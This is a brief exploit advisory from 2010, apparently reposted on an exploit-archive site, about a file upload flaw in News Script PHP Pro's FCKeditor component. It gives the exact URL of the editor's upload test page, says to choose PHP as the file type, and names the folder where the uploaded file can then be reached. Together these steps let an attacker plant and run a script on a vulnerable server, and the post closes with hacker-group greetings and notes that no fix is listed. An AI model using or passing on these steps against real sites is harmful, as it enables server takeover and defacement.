News Script PHP Pro (fckeditor) File Upload Vulnerability

2010-12-29 14:15:17


==============================================================================

[»] News Script PHP Pro (fckeditor) File Upload Vulnerability

==============================================================================

[»] Title : [ News Script PHP Pro (fckeditor) File Upload Vulnerability ]

[»] Script : [ News Script PHP Pro ]

[»] TestedON: [ linux/php ]

[»] Download: [ http://newsscriptphp.com/ ]

[»] Author : [ Net.Edit0r }

[»] Email : [ [email protected] ]

[»] Date : [ 2010-12-26 ]

[»] Version : [ Full Version ]

[»] CVE : [Web Applications]

###########################################################################


===[ Exploit ]=== ./Iranian HackerZ

[»] http://server/[patch]/fckeditor/editor/filemanager/connectors/uploadtest.html

[»] Select the "File Upload" To use = php

===[ Upload To ]===

[»] http://server/[patch]/userfiles/Name File

===[ Demo ]===

[»] http://server/news/fckeditor/editor/filemanager/connectors/uploadtest.html

Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , M4hd1 , Ali.Erroor

BHG : Net.Edit0r ~ Darkcoder ~ keracker

###########################################################################

Fixes

No fixes

In order to submit a new fix you need to be registered.